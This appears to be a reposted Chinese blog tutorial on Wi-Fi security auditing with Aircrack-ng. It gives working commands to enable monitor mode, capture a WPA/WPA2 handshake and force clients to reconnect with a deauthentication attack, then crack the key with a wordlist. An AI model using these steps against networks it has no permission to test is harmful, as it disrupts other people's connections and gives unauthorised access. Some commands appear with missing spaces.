使用Aircrack-ng进行无线安全审计

设置监听模式

激活网卡

ifconfigwlan0 up

结束占用网络接口的进程

airmon-ng checkkill

开启监听模式

airmon-ng start wlan0

使用Aircrack-ng进行无线安全审计_第1张图片

查看网卡是否成功开启了监听模式

iwconfig

Mode状态为Monitor为开启成功,Managed为不成功。

使用Aircrack-ng进行无线安全审计_第2张图片

捕获数据包

此处须填写监听模式的接口,一般为wlan0mon。

airodump-ng wlan0mon

按Ctrl+C可停止扫描。

使用Aircrack-ng进行无线安全审计_第3张图片

4airodump-ng -t WPA2 wlan0mon#仅捕获WPA2加密方式的数据包

airodump-ng --bssid 00:25:00:FF:94:73 wlan0mon#指定捕获BSSID的包

airodump-ng -N Tech-For-Test wlan0mon#指定捕获ESSID的包

airodump-ng -c 6 wlan0mon#捕获信道为6的包

保存捕获的数据包

airodump-ng -w packet wlan0mon#将捕获的数据包保存到名为packet的文件中

读取数据包

airodump-ng -r xxx.pcap#读取名为xxx.pcap的数据包

这里我们使用以下命令:

airodump-ng -c11-wAirCrk--bssidF0:DB:F8:0C:0B:28wlan0mon

频道号写入AirCrk文件

等待右上角出现WPA handshake关键字时说明成功获得到了包含WPA密码的4次握手数据报文,此时可使用aireplay注入。

若没有看到这个提示,可以增加Deauth的发送数量。

使用Aircrack-ng进行无线安全审计_第4张图片

其他导致无法获取握手报文的原因(摘自Longas的《Linux-BT4黑客手册》):

1.可能该无线网卡对这些无线工具的支持性不好,比如很多笔记本自带的无线网卡支持性就不好。

2.无线接入点自身问题,有的AP在遭受攻击后会短时间内失去响应,需重启后等待片刻才能恢复正常工作状态。

注入数据包

目的是强制客户端重新连接,从而获取WPA/WPA2握手数据包。(需airodump-ng处于运行状态)

重新打开一个终端。

-0表示Deauth攻击模式 5表示发送次数

aireplay-ng -0 1 -aA4:2B:8C:7D:98:7D-cF0:DB:F8:0C:0B:28wlan0mon #使用Deauth攻击模式 破解WPA/WPA2包。

BSSID mac地址             STATION mac地址

使用Aircrack-ng进行无线安全审计_第5张图片

最后使用加载字典对cap数据包进行破解。

aircrack-ng -w dic.txt -b F0:DB:F8:0C:0B:28 log-01.cap

使用Aircrack-ng进行无线安全审计_第6张图片

如果字典比较大,跑起来可能需要很久,这个过程是很考验RP的,破解成功后会出现下图界面:

使用Aircrack-ng进行无线安全审计_第7张图片

你可能感兴趣的:(使用Aircrack-ng进行无线安全审计)